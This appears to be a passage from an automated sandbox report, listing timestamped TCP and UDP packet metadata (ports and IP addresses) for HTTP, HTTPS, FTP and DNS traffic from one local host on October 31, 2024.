Oct 31, 2024 11:45:28.139311075 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.139369011 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.139377117 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.139422894 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.139720917 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.139754057 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.139765978 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.139799118 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.139926910 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.139975071 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.140005112 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.140050888 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.140301943 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.140347958 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.140423059 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.140470028 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.140489101 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.140537024 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.140609026 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.140654087 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.174846888 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.174891949 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.174911976 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.174926043 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.174940109 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.174958944 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.174967051 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.175000906 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.240283966 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.240318060 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.240358114 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.240370989 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.240379095 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.240406036 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.240438938 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.240458012 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.240473986 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.240489006 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.240511894 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.243552923 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.243614912 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.243653059 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.243688107 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.243700027 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.243732929 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.243851900 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.243885994 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.243900061 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.243920088 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.243926048 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.243976116 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.243988991 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.244012117 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.244019985 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.244051933 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.291891098 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.291924000 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.291965961 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.291985035 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.332405090 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.332484007 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.332689047 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.332740068 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.357366085 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.357394934 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.357446909 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.357448101 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.357470036 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.357481956 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.357489109 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.357533932 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.357558012 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.357567072 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.357570887 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.357606888 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360579967 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360609055 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360630989 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360646963 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360661030 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360692978 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360697031 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360727072 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360758066 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360770941 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360776901 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360820055 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360827923 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360856056 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360871077 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360891104 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360899925 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360924959 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360938072 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360960007 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360968113 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.360987902 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.360996008 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.361027002 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.449810028 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.449865103 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.449866056 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.449899912 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.449920893 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.449934959 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.474517107 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.474570990 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.474574089 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.474606037 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.474612951 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.474638939 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.474646091 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.474672079 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.474678040 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.474711895 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.477646112 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477680922 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477715969 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477725983 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.477750063 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477778912 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.477782965 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477794886 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.477824926 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.477832079 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477864981 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477890968 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.477897882 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.477906942 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.477943897 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.524693966 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.524751902 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.524945974 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.524996996 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.566437960 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.566473007 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.566487074 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.566508055 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.566514969 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.566540003 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.591521978 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.591578007 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.591584921 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.591619015 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.591634989 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.591661930 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.591667891 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.591701984 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.591715097 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.591733932 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.591744900 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.591778040 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594619036 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594661951 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594671965 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594703913 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594710112 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594742060 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594813108 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594846010 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594858885 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594878912 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594888926 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594912052 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594926119 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594944954 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.594955921 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.594985962 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.683501005 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.683535099 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.683584929 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.683585882 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.683599949 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.683618069 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.683626890 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.683650970 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.683659077 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.683685064 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.683692932 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.683723927 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.708569050 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.708619118 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.708635092 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.708652020 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.708666086 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.708683968 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.708684921 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.708718061 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.708734989 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.708756924 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.708769083 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.708820105 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.711673975 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.711705923 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.711726904 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.711741924 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.711755037 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.711786985 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.711795092 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.711819887 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.711824894 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.711853027 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.711858988 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.711890936 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.712003946 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.712035894 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.712049961 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.712070942 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.712074041 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.712104082 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.712111950 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.712143898 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.800659895 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.800715923 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.800734997 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.800749063 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.800754070 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.800785065 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.800791025 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.800817966 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.800827980 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.800858021 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.825541973 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.825593948 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.825598955 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.825627089 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.825634003 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.825659990 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.825668097 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.825692892 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.825702906 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.825740099 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.828675032 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.828725100 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.828730106 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.828775883 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.828789949 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.828809977 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.828829050 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.828843117 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.828860044 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.828875065 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.828890085 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.828922987 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.829065084 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.829097986 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.829114914 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.829133034 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.829145908 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.829180002 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.829180002 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.829230070 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.917625904 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.917681932 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.917689085 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.917715073 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.917721033 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.917747974 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.917752028 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.917779922 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.917782068 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.917814970 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.917823076 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.917855978 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.942624092 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.942687035 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.942687988 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.942733049 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.942739010 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.942773104 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.942784071 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.942804098 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.942815065 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.942837000 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.942845106 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.942881107 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.945784092 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.945828915 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.945835114 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.945880890 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.945888042 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.945923090 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.945931911 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.945955992 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.945966959 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.945990086 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.946000099 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.946032047 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.946038961 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.946069002 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.946082115 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.946100950 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.946110964 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.946132898 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.946144104 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.946177959 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.034861088 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.034898996 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.034919024 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.034934044 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.034940958 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.034966946 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.034966946 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.035001040 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.035002947 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.035038948 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.075860023 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.075917959 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.075918913 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.075952053 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.075959921 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.075985909 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:29.075989008 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:29.076024055 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:30.024135113 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.024159908 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.024225950 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.038239956 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.038254023 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.647953987 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.648053885 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.649960041 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.649971008 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.650376081 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.692317009 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.697432995 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.743326902 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.878984928 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.879038095 CET	443	62131	172.67.74.152	192.168.2.4
Oct 31, 2024 11:45:30.879093885 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:30.886112928 CET	62131	443	192.168.2.4	172.67.74.152
Oct 31, 2024 11:45:31.938688040 CET	62142	21	192.168.2.4	192.185.13.234
Oct 31, 2024 11:45:31.943578005 CET	21	62142	192.185.13.234	192.168.2.4
Oct 31, 2024 11:45:31.943658113 CET	62142	21	192.168.2.4	192.185.13.234
Oct 31, 2024 11:45:31.947139025 CET	62142	21	192.168.2.4	192.185.13.234
Oct 31, 2024 11:45:31.952243090 CET	21	62142	192.185.13.234	192.168.2.4
Oct 31, 2024 11:45:31.952450991 CET	62142	21	192.168.2.4	192.185.13.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 11:44:23.654659033 CET	53	53240	1.1.1.1	192.168.2.4
Oct 31, 2024 11:45:30.010555983 CET	61872	53	192.168.2.4	1.1.1.1
Oct 31, 2024 11:45:30.019054890 CET	53	61872	1.1.1.1	192.168.2.4
